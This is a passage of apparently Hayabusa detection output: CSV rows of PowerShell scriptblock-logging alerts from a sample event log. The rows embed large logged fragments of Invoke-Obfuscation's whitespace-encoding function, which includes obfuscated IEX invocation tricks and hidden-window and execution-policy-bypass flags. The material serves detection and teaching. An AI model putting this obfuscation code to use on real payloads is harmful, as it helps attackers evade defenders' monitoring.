$Char.ToUpper()} $Char}) -Join '' $StrStr = ([Char[]]'[String]' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Join = ([Char[]]'-Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $CharStr = ([Char[]]'Char' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Int = ([Char[]]'Int' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Length = ([Char[]]'Length' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ForEachObject = ([Char[]]$ForEachObject | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SplitMethod = ([Char[]]$SplitMethod | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SplitMethod2 = ([Char[]]'Split' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Trim = ([Char[]]$Trim | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SplitOnDelim = Get-Random -Input @("" $SplitMethod '$DigitDelimiterChar'"","".$SplitMethod2('$DigitDelimiterChar')"") # Generate random variable name to store the script's intermediate state while being reassembled. $RandomScriptVar = (Get-Random -Input @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') -Count (Get-Random -Input @(5..8)) | ForEach-Object {$UpperLowerChar = $_; If(Get-Random -Input @(0..1)) {$UpperLowerChar = $UpperLowerChar.ToUpper()} $UpperLowerChar}) -Join '' # Build the first part of the decoding routine. $ScriptStringPart1 = ""'$EncodedString'"" + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + ""`$$RandomScriptVar"" + ' '*(Get-Random -Input @(0,1)) + '=' + ' '*(Get-Random -Input @(0,1)) + ""`$_ $SplitMethod '$IntDelimiterChar'"" + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + ""'$DigitDelimiterChar'"" + ' '*(Get-Random -Input @(0,1)) + ';' + ' '*(Get-Random -Input @(0,1)) + ""`$_$SplitOnDelim"" + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + ""`$_.$Length"" + ' '*(Get-Random -Input @(0,1)) + '-' + ' '*(Get-Random -Input @(0,1)) + '1' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ';' # Randomly select between various conversion syntax options. $RandomStringSyntax = ([Char[]](Get-Random -Input @('[String]$_','$_.ToString()')) | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomConversionSyntax = @() $RandomConversionSyntax += ""[$CharStr]"" + ' '*(Get-Random -Input @(0,1)) + ""[$Int]"" + ' '*(Get-Random -Input @(0,1)) + ""`$_"" $RandomConversionSyntax += ""[$Int]"" + ' '*(Get-Random -Input @(0,1)) + ""`$_"" + ' '*",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.285 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant <http://www.mandiant.com> # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-EncodedWhitespaceCommand { <# .SYNOPSIS Generates Whitespace encoded payload for a PowerShell command or script. Optionally it adds command line output to final command. Invoke-Obfuscation Function: Out-EncodedWhitespaceCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-EncodedWhitespaceCommand encodes an input PowerShell scriptblock or path as a Whitespace-and-Tab encoded payload. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER NoExit Outputs the option to not exit after running startup commands. .PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. .PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. .PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. .PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER PassThru (Optional) Avoids applying final command line syntax if you want to apply more obfuscation functions (or a different launcher function) to the final output. .EXAMPLE C:\PS> Out-EncodedWhitespaceCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive powershell -NoP -NonInterac ""' '|%{$uXOrcSp= $_ -CSplIt ' ' | %{' ' ; $_ -CSplIt ' ' |% { $_.lEngth- 1}} ; .( ([string]''.LAstINDEXOFANy)[92,95,96]-join'')( (($uXOrcSp[0..($uXOrcSp.lEngth-1)] -join'' ).TrIm( ' ').SPLIT(' ' ) |% {([chAr][iNt]$_) })-join '' ) }"" C:\PS> Out-EncodedWhitespaceCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive -PassThru ' '| % {$gyPrfqv= $_ -csPLiT ' '|% { ' ';$_.SPlIT(' ') | %{$_.LEngth - 1 }}; [StRINg]::joIn( '',((-jOin ($gyPrfqv[0..($gyPrfqv.LEngth-1)])).triM( ' ' ).SPlIT(' ' )|% { ( [CHAr][iNt]$_)}))|&( $eNv:CoMSPEC[4,26,25]-jOiN'')} .NOTES Inspiration for this encoding technique came from Casey Smith (@subTee) while at the 2017 BlueHat IL conference. This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Switch] $PassThru ) # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # Convert $ScriptString to an ASCII-encoded array. $AsciiArray = [Int[]][Char[]]$ScriptString # Encode ASCII array with defined EncodingChar and DelimiterChar (randomly-selected as whitespace and tab, [Char]9). $RandomIndex = Get-Random -Input @(0,1) $EncodedArray = @() $EncodingChar = @(' ',[Char]9)[$RandomIndex] $DigitDelimiterChar = @([Char]9,' ')[$RandomIndex] # Enumerate each ASCII value and (ultimately) store decoded ASCII values in $EncodedArray array. ForEach($AsciiValue in $AsciiArray) { $EncodedAsciiValueArray = @() # Enumerate each digit in current ASCII value and convert it to DelimiterChar*Digit. ForEach($Digit in [Char[]][String]$AsciiValue) { $EncodedAsciiValueArray += [String]$EncodingChar*([Int][String]$Digit + 1) } $EncodedArray += ($EncodedAsciiValueArray -Join $DigitDelimiterChar) } # Set $IntDelimiterChar to be two instances of $DigitDelimiterChar. # $IntDelimiterChar will essentially be like the comma in the original ASCII array. $IntDelimiterChar = $DigitDelimiterChar + $DigitDelimiterChar # Join together final $EncodedString with delimiter selected above. $EncodedString = ($EncodedArray -Join $IntDelimiterChar) # Generate random case versions for necessary operations. $ForEachObject = Get-Random -Input @('ForEach','ForEach-Object','%') $SplitMethod = Get-Random -Input @('-Split','-CSplit','-ISplit') $Trim = Get-Random -Input @('Trim','TrimStart') $StrJoin = ([Char[]]'[String]::Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $StrStr = ([Char[]]'[String]' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Join = ([Char[]]'-Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $CharStr = ([Char[]]'Char' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Int = ([Char[]]'Int' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Length = ([Char[]]'Length' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ForEachObject = ([Char[]]$ForEachObject | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SplitMethod = ([Char[]]$SplitMethod | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SplitMethod2 = ([Char[]]'Split' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Trim = ([Char[]]$Trim | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SplitOnDelim = Get-Random -Input @("" $SplitMethod '$DigitDelimiterChar'"","".$SplitMethod2('$DigitDelimiterChar')"") # Generate random variable name to store the script's intermediate state while being reassembled. $RandomScriptVar = (Get-Random -Input @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') -Count (Get-Random -Input @(5..8)) | ForEach-Object {$UpperLowerChar = $_; If(Get-Random -Input @(0..1)) {$UpperLowerChar = $UpperLowerChar.ToUpper()} $UpperLowerChar}) -Join '' # Build the first part of the decoding routine. $ScriptStringPart1 = ""'$EncodedString'"" + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + ""`$$RandomScriptVar"" + ' '*(Get-Random -Input @(0,1)) + '=' + ' '*(Get-Random -Input @(0,1)) + ""`$_ $SplitMethod '$IntDelimiterChar'"" + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + ""'$DigitDelimiterChar'"" + ' '*(Get-Random -Input @(0,1)) + ';' + ' '*(Get-Random -Input @(0,1)) + ""`$_$SplitOnDelim"" + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + ""`$_.$Length"" + ' '*(Get-Random -Input @(0,1)) + '-' + ' '*(Get-Random -Input @(0,1)) + '1' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ';' # Randomly select between various conversion syntax options. $RandomStringSyntax = ([Char[]](Get-Random -Input @('[String]$_','$_.ToString()')) | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomConversionSyntax = @() $RandomConversionSyntax += ""[$CharStr]"" + ' '*(Get-Random -Input @(0,1)) + ""[$Int]"" + ' '*(Get-Random -Input @(0,1)) + ""`$_"" $RandomConversionSyntax += ""[$Int]"" + ' '*(Get-Random -Input @(0,1)) + ""`$_"" + ' '*",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.285 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.285 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"(Get-Random -Input @(0,1)) + (Get-Random -Input @('-as','-As','-aS','-AS')) + ' '*(Get-Random -Input @(0,1)) + ""[$CharStr]"" $RandomConversionSyntax = (Get-Random -Input $RandomConversionSyntax) # Create array syntax for encoded $ScriptString as alternative to .Split/-Split syntax. $EncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$EncodedArray += ([Convert]::ToString(([Int][Char]$_),$EncodingBase) + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)))} # Remove trailing comma from $EncodedArray. $EncodedArray = ('(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray.Trim().Trim(',') + ')') # Generate random syntax to create/set OFS variable ($OFS is the Output Field Separator automatic variable). # Using Set-Item and Set-Variable/SV/SET syntax. Not using New-Item in case OFS variable already exists. # If the OFS variable did exists then we could use even more syntax: $varname, Set-Variable/SV, Set-Item/SET, Get-Variable/GV/Variable, Get-ChildItem/GCI/ChildItem/Dir/Ls # For more info: https://msdn.microsoft.com/en-us/powershell/reference/5.1/microsoft.powershell.core/about/about_automatic_variables $SetOfsVarSyntax = @() $SetOfsVarSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVarSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVar = (Get-Random -Input $SetOfsVarSyntax) $SetOfsVarBackSyntax = @() $SetOfsVarBackSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBackSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBack = (Get-Random -Input $SetOfsVarBackSyntax) # Randomize case of $SetOfsVar and $SetOfsVarBack. $SetOfsVar = ([Char[]]$SetOfsVar | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SetOfsVarBack = ([Char[]]$SetOfsVarBack | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Generate the code that will iterate through each element of the array. $BaseScriptArray1 = ""`$$RandomScriptVar[0..(`$$RandomScriptVar.$Length-1)]"" # Generate random JOIN syntax for all above options. $NewScriptArray1 = @() $NewScriptArray1 += $BaseScriptArray1 + ' '*(Get-Random -Input @(0,1)) + $Join + ' '*(Get-Random -Input @(0,1)) + ""''"" $NewScriptArray1 += $Join + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $BaseScriptArray1 + ' '*(Get-Random -Input @(0,1)) + ')' $NewScriptArray1 += $StrJoin + '(' + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $BaseScriptArray1 + ' '*(Get-Random -Input @(0,1)) + ')' $NewScriptArray1 += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + $StrStr + $BaseScriptArray1 + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' # Randomly select one of the above commands. $NewScript1 = (Get-Random -Input $NewScriptArray1) # Generate the code that will decrypt and execute the payload and randomly select one. $BaseScriptArray2 = @() $BaseScriptArray2 += '(' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $NewScript1 + ' '*(Get-Random -Input @(0,1)) + "").$Trim("" + ' '*(Get-Random -Input @(0,1)) + ""'$DigitDelimiterChar '"" + ' '*(Get-Random -Input @(0,1)) + "").$SplitMethod2("" + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DigitDelimiterChar + ""'"" + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray2 += ""`[$CharStr[]]"" + ' '*(Get-Random -Input @(0,1)) + ""[$Int[]]"" + ' '*(Get-Random -Input @(0,1)) + ""("" + ' '*(Get-Random -Input @(0,1)) + $NewScript1 + ' '*(Get-Random -Input @(0,1)) + "").$Trim("" + ' '*(Get-Random -Input @(0,1)) + ""'$DigitDelimiterChar '"" + ' '*(Get-Random -Input @(0,1)) + "").$SplitMethod2("" + ' '*(Get-Random -Input @(0,1)) + ""'$DigitDelimiterChar'"" + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray2 = (Get-Random -Input $BaseScriptArray2) # Generate random JOIN syntax for all above options. $NewScriptArray2 = @() $NewScriptArray2 += $BaseScriptArray2 + ' '*(Get-Random -Input @(0,1)) + $Join + ' '*(Get-Random -Input @(0,1)) + ""''"" $NewScriptArray2 += $Join + ' '*(Get-Random -Input @(0,1)) + '(' + $BaseScriptArray2 + ')' $NewScriptArray2 += $StrJoin + '(' + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $BaseScriptArray2 + ' '*(Get-Random -Input @(0,1)) + ')' # Randomly select one of the above commands. $NewScript = (Get-Random -Input $NewScriptArray2) # Generate random invoke operation syntax. # Below code block is a copy from Out-ObfuscatedStringCommand.ps1. It is copied into this encoding function so that this will remain a standalone script without dependencies. $InvokeExpressionSyntax = @() $InvokeExpressionSyntax += (Get-Random -Input @('IEX','Invoke-Expression')) # Added below slightly-randomized obfuscated ways to form the string 'iex' and then invoke it with . or &. # Though far from fully built out, these are included to highlight how IEX/Invoke-Expression is a great indicator but not a silver bullet. # These methods draw on common environment variable values and PowerShell Automatic Variable values/methods/members/properties/etc. $InvocationOperator = (Get-Random -Input @('.','&')) + ' '*(Get-Random -Input @(0,1)) $InvokeExpressionSyntax += $InvocationOperator + ""( `$ShellId[1]+`$ShellId[13]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$PSHome["" + (Get-Random -Input @(4,21)) + ""]+`$PSHome["" + (Get-Random -Input @(30,34)) + ""]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:Public[13]+`$env:Public[5]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:ComSpec[4,"" + (Get-Random -Input @(15,24,26)) + "",25]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""(("" + (Get-Random -Input @('Get-Variable','GV','Variable')) + "" '*mdr*').Name[3,11,2]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.Insert)"" , ""''.Insert.ToString()"")) + '[' + (Get-Random -Input @(3,7,14,23,33)) + ',' + (Get-Random -Input @(10,26,41)) + "",27]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.Normalize)"" , ""''.Normalize.ToString()"")) + '[' + (Get-Random -Input @(3,13,23,33,55,59,77)) + ',' + (Get-Random -Input @(15,35,41,45)) + "",46]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.Chars)"" , ""''.Chars.ToString()"")) + '[' + (Get-Random -Input @(11,15)) + ',' + (Get-Random -Input @(18,24)) + "",19]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.SubString)"" , ""''.SubString.ToString()"")) + '[' + (Get-Random -Input @(3,13,17,26,37,47,51,60,67)) + ',' + (Get-Random -Input @(29,63,72)) + ',' + (Get-Random -Input @(30,64)) + ""]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.Remove)"" , ""''.Remove.ToString()"")) + '[' + (Get-Random -Input @(3,14,23,30,45,56,65)) + ',' + (Get-Random -Input @(8,12,26,50,54,68)) + ',' + (Get-Random -Input @(27,69)) + ""]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.LastIndexOfAny)"" , ""''.LastIndexOfAny.ToString()"")) + '[' + (Get-Random -Input @(0,8,34,42,67,76,84,92,117,126,133)) + ',' + (Get-Random -Input @(11,45,79,95,129)) + ',' + (Get-Random -Input @(12,46,80,96,130)) + ""]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.LastIndexOf)"" , ""''.LastIndexOf.ToString()"")) + '[' + (Get-Random -Input @(0,8,29,37,57,66,74,82,102,111,118,130,138,149,161,169,180,191,200,208,216,227,238,247,254,266,274,285,306,315,326,337,345,356,367,376,393,402,413,424,432,443,454,463,470,491,500,511)) + ',' + (Get-Random -Input @(11,25,40,54,69,85,99,114,141,157,172,188,203,219,235,250,277,293,300,333,348,364,379,387,420,435,451,466,485,518)) + ',' + (Get-Random -Input @(12,41,70,86,115,142,173,204,220,251,278,349,380,436,467)) + ""]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.IsNormalized)"" , ""''.IsNormalized.ToString()"")) + '[' + (Get-Random -Input @(5,13,26,34,57,61,75,79)) + ',' + (Get-Random -Input @(15,36,43,47)) + "",48]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.IndexOfAny)"" , ""''.IndexOfAny.ToString()"")) + '[' + (Get-Random -Input @(0,4,30,34,59,68,76,80,105,114,121)) + ',' + (Get-Random -Input @(7,37,71,83,117)) + ',' + (Get-Random -Input @(8,38,72,84,118)) + ""]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.IndexOf)"" , ""''.IndexOf.ToString()"")) + '[' + (Get-Random -Input @(0,4,25,29,49,58,66,70,90,99,106,118,122,133,145,149,160,171,180,188,192,203,214,223,230,242,246,257,278,287,298,309,313,324,335,344,361,370,381,392,396,407,418,427,434,455,464,475)) + ',' + (Get-Random -Input @(7,21,32,46,61,73,87,102,125,141,152,168,183,195,211,226,249,265,272,305,316,332,347,355,388,399,415,430,449,482)) + ',' + (Get-Random -Input @(8,33,62,74,103,126,153,184,196,227,250,317,348,400,431)) + ""]-Join''"" + "")"" # Randomly choose from above invoke operation syntaxes. $InvokeExpression = (Get-Random -Input $InvokeExpressionSyntax) # Randomize the case of selected invoke operation. $InvokeExpression = ([Char[]]$InvokeExpression | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Choose random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX) $InvokeOptions = @() $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $InvokeExpression + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $InvokeExpression # Randomly choose from above invoke operation syntaxes. $NewScript = (Get-Random -Input $InvokeOptions) # Reassemble all components of the final command. $NewScript = $ScriptStringPart1 + $NewScript + '}' # If user did not include -PassThru flag then continue with adding execution flgs and powershell.exe to $NewScript. If(!$PSBoundParameters['PassThru']) { # Array to store all selected PowerShell execution flags. $PowerShellFlags = @() # Build the PowerShell execution flags by randomly selecting execution flags substrings and randomizing the order. # This is to prevent Blue Team from placing false hope in simple signatures for common substrings of these execution flags. $CommandlineOptions = New-Object String[](0) If($PSBoundParameters['NoExit']) { $FullArgument = ""-NoExit""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile']) { $FullArgument = ""-NoProfile""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NonInteractive']) { $FullArgument = ""-NonInteractive""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo']) { $FullArgument = ""-NoLogo""; $CommandlineOptions += $FullArgument.SubString(0,(G",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.285 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"(Get-Random -Input @(0,1)) + (Get-Random -Input @('-as','-As','-aS','-AS')) + ' '*(Get-Random -Input @(0,1)) + ""[$CharStr]"" $RandomConversionSyntax = (Get-Random -Input $RandomConversionSyntax) # Create array syntax for encoded $ScriptString as alternative to .Split/-Split syntax. $EncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$EncodedArray += ([Convert]::ToString(([Int][Char]$_),$EncodingBase) + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)))} # Remove trailing comma from $EncodedArray. $EncodedArray = ('(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray.Trim().Trim(',') + ')') # Generate random syntax to create/set OFS variable ($OFS is the Output Field Separator automatic variable). # Using Set-Item and Set-Variable/SV/SET syntax. Not using New-Item in case OFS variable already exists. # If the OFS variable did exists then we could use even more syntax: $varname, Set-Variable/SV, Set-Item/SET, Get-Variable/GV/Variable, Get-ChildItem/GCI/ChildItem/Dir/Ls # For more info: https://msdn.microsoft.com/en-us/powershell/reference/5.1/microsoft.powershell.core/about/about_automatic_variables $SetOfsVarSyntax = @() $SetOfsVarSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVarSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVar = (Get-Random -Input $SetOfsVarSyntax) $SetOfsVarBackSyntax = @() $SetOfsVarBackSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBackSyntax += (Get-Random -Input 